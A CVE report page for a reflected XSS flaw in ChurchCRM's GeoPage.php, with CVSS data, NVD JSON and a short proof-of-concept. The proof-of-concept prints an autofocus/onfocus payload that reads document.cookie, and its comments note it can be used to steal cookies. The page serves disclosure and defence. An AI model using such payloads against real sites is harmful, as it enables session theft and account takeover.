Security Vulnerability Report
CVE-2026-39332 CVSS 8.7 HIGH

Published: 2026-04-07 18:16:45
Last Modified: 2026-04-10 20:58:07

Description

ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0.

CVSS Details

CVSS Score
8.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 7.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- PoC for CVE-2026-39332 ChurchCRM Reflected XSS -->
<!-- The vulnerability is triggered via autofocus in GeoPage.php -->
<!-- Example malicious URL parameter -->
<!-- Payload: "><input autofocus onfocus=alert(document.cookie)> -->
<!-- HTML Injection Simulation -->
<div>
  <p>Vulnerable Input Field:</p>
  <!-- The application reflects user input here without sanitization -->
  <input type="text" value=""><input autofocus onfocus=alert('XSS_CVE-2026-39332')>">
</div>
<script>
  // Explanation:
  // 1. The payload closes the original attribute using ">
  // 2. It injects a new input tag with 'autofocus' and 'onfocus' event handlers.
  // 3. When the page loads, the browser automatically focuses on this element.
  // 4. The onfocus event executes the JavaScript, stealing cookies or performing actions.
  console.log("PoC loaded for ChurchCRM GeoPage.php XSS");
</script>

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq (Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39332", "sourceIdentifier": "[email protected]", "published": "2026-04-07T18:16:44.717", "lastModified": "2026-04-10T20:58:07.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to 7.1.0, a reflected Cross-Site Scripting (XSS) vulnerability in GeoPage.php allows any authenticated user to inject arbitrary JavaScript into the browser of another authenticated user. Because the payload fires automatically via autofocus with no user interaction required, an attacker can steal session cookies and fully take over any victim account, including administrator accounts, by tricking them into submitting a crafted form. This vulnerability is fixed in 7.1.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.0", "matchCriteriaId": "BF846F61-0C1E-49AB-B691-A01937A6C24D"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hc6g-h48v-wqvq", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}